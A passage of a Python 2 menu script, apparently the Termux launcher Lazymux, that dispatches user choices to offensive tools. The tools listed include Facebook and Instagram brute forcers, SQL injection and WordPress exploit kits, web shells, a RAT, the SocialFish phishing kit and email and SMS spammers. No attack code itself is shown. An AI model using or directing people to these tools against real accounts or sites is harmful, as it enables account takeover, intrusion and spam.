		print "    [10] Indonesian Wordlist"
		print "    [11] Xshell"
		print "    [12] Social-Engineering"
		print "    [13] BlackBox"
		print "    [14] Hashzer\n"
		print "    [00] Back to main menu\n"
		passtak = raw_input("lzmx > ")
		
		if passtak == "01" or passtak == "1":
			hydra()
		elif passtak == "02" or passtak == "2":
			facebook_bruteForce()
		elif passtak == "03" or passtak == "3":
			facebook_BruteForce()
		elif passtak == "04" or passtak == "4":
			fbBrute()
		elif passtak == "05" or passtak == "5":
			black_hydra()
		elif passtak == "06" or passtak == "6":
			hash_buster()
		elif passtak == "07" or passtak == "7":
			leethash()
		elif passtak == "08" or passtak == "8":
			cupp()
		elif passtak == "09" or passtak == "9":
			instaHack()
		elif passtak == "10":
			indonesian_wordlist()
		elif passtak == "11":
			xshell()
		elif passtak == "12":
			social()
		elif passtak == "13":
			blackbox()
		elif passtak == "14":
			hashzer()
		elif passtak == "00" or passtak == "0":
			restart_program()
		else:
			print "\nERROR: Wrong Input"
			timeout(2)
			restart_program()
	
	elif lazymux == "5" or lazymux == "05":
		print "\n    [01] sqlmap"
		print "    [02] Webdav"
		print "    [03] xGans"
		print "    [04] Webdav Mass Exploit"
		print "    [05] WPSploit"
		print "    [06] sqldump"
		print "    [07] Websploit"
		print "    [08] sqlmate"
		print "    [09] sqlokmed"
		print "    [10] zones"
		print "    [11] Xshell"
		print "    [12] SH33LL"
		print "    [13] XAttacker"
		print "    [14] XSStrike"
		print "    [15] Breacher"
		print "    [16] OWScan\n"
		print "    [00] Back to main menu\n"
		webhack = raw_input("lzmx > ")
		
		if webhack == "01" or webhack == "1":
			sqlmap()
		elif webhack == "02" or webhack == "2":
			webdav()
		elif webhack == "03" or webhack == "3":
			xGans()
		elif webhack == "04" or webhack == "4":
			webmassploit()
		elif webhack == "05" or webhack == "5":
			wpsploit()
		elif webhack == "06" or webhack == "6":
			sqldump()
		elif webhack == "07" or webhack == "7":
			websploit()
		elif webhack == "08" or webhack == "8":
			sqlmate()
		elif webhack == "09" or webhack == "9":
			sqlokmed()
		elif webhack == "10":
			zones()
		elif webhack == "11":
			xshell()
		elif webhack == "12":
			sh33ll()
		elif webhack == "13":
			xattacker()
		elif webhack == "14":
			xsstrike()
		elif webhack == "15":
			breacher()
		elif webhack == "16":
			owscan()
		elif webhack == "00" or webhack == "0":
			restart_program()
		else:
			print "\nERROR: Wrong Input"
			timeout(2)
			restart_program()
	elif lazymux == "6" or lazymux == "06":
		print "\n    [01] Metasploit"
		print "    [02] commix"
		print "    [03] sqlmap"
		print "    [04] Brutal"
		print "    [05] A-Rat"
		print "    [06] WPSploit"  
		print "    [07] Websploit"
		print "    [08] Routersploit"
		print "    [09] BlackBox"
		print "    [10] XAttacker"
		print "    [11] TXTool\n"
		print "    [00] Back to main menu\n"
		exploitool = raw_input("lzmx > ")
		
		if exploitool == "01" or exploitool == "1":
			metasploit()
		elif exploitool == "02" or exploitool == "2":
			commix()
		elif exploitool == "03" or exploitool == "3":
			sqlmap()
		elif exploitool == "04" or exploitool == "4":
			brutal()
		elif exploitool == "05" or exploitool == "5":
			a_rat()
		elif exploitool == "06" or exploitool == "6":
			wpsploit()
		elif exploitool == "07" or exploitool == "7":
			websploit()
		elif exploitool == "08" or exploitool == "8":
			routersploit()
		elif exploitool == "09" or exploitool == "9":
			blackbox()
		elif exploitool == "10":
			xattacker()
		elif exploitool == "11":
			txtool()
		elif exploitool == "00" or exploitool == "0":
			restart_program()
		else:
			print "\nERROR: Wrong Input"
			timeout(2)
			restart_program()
	elif lazymux == "7" or lazymux == "07":
		print "\n    [01] KnockMail"
		print "    [02] Spammer-Grab"
		print "    [03] Hac"
		print "    [04] Spammer-Email"
		print "    [05] SocialFish"
		print "    [06] santet-online"
		print "    [07] SpazSMS\n"
		print "    [00] Back to main menu\n"
		sspoof = raw_input("lzmx > ")
		
		if sspoof == "01" or sspoof == "1":
			knockmail()
		elif sspoof == "02" or sspoof == "2":
			spammer_grab()
		elif sspoof == "03" or sspoof == "3":
			hac()
		elif sspoof == "04" or sspoof == "4":
			spammer_email()
		elif sspoof == "05" or sspoof == "5":
			socfish()
		elif sspoof == "06" or sspoof == "6":
			sanlen()
		elif sspoof == "07" or sspoof == "7":
			spazsms()
		elif sspoof == "00" or sspoof == "0":
			restart_program()
		else:
			print "\nERROR: Wrong Input"
			timeout(2)
			restart_program()
	
	elif lazymux == "8" or lazymux == "08":
		print "\n    [01] SpiderBot"
		print "    [02] Ngrok"
		print "    [03] Sudo"
		print "    [04] Ubuntu"
		print "    [05] Fedora"
		print "    [06] Kali Nethunter"
		print "    [07] VCRT"
		print "    [08] E-Code"
		print "    [09] Termux-Styling"
		print "    [10] PassGen\n"
		print "    [00] Back to main menu\n"
		moretool = raw_input("lzmx > ")
		
		if moretool == "01" or moretool == "1":
			spiderbot()
		elif moretool == "02" or moretool == "2":
			ngrok()
		elif moretool == "03" or moretool == "3":
			sudo()
		elif moretool == "04" or moretool == "4":
			ubuntu()
		elif moretool == "05" or moretool == "5":
			fedora()
		elif moretool == "06" or moretool == "6":
			nethunter()
		elif moretool == "07" or moretool == "7":
			vcrt()
		elif moretool == "08" or moretool == "8":
			ecode()
		elif moretool == "09" or moretool == "9":
			stylemux()
		elif moretool == "10":
			passgencvar()
		elif moretool == "00" or moretool == "0":
			restart_program()
		else:
			print "\nERROR: Wrong Input"
			timeout(2)
			restart_program()
	
	elif lazymux == "10":
		sys.exit()
	
	else:
		print "\nERROR: Wrong Input"
		timeout(2)
		restart_program()